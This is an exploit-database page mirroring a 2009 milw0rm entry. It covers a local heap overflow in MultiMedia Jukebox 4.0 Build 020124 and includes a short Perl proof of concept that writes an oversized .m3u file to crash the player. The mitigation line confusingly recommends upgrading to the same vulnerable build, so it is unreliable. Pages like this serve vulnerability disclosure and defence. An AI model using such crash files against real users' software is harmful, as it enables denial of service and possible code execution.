header-logo
Suggest Exploit
vendor:
MultiMedia Jukebox
by:
HACK4LOVE
8,8
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: MultiMedia Jukebox
Affected Version From: 4.0 Build 020124
Affected Version To: 4.0 Build 020124
Patch Exists: Yes
Related CWE: N/A
CPE: a:sorcerer_software:multimedia_jukebox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC

A local heap overflow vulnerability exists in MultiMedia Jukebox 4.0 Build 020124. By creating a specially crafted .m3u file with an overly long string, an attacker can cause a buffer overflow, resulting in a denial of service condition or the potential execution of arbitrary code.

Mitigation:

Upgrade to the latest version of MultiMedia Jukebox 4.0 Build 020124.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################

# milw0rm.com [2009-07-16]

Navigation

Suggest Exploit

Services By CQR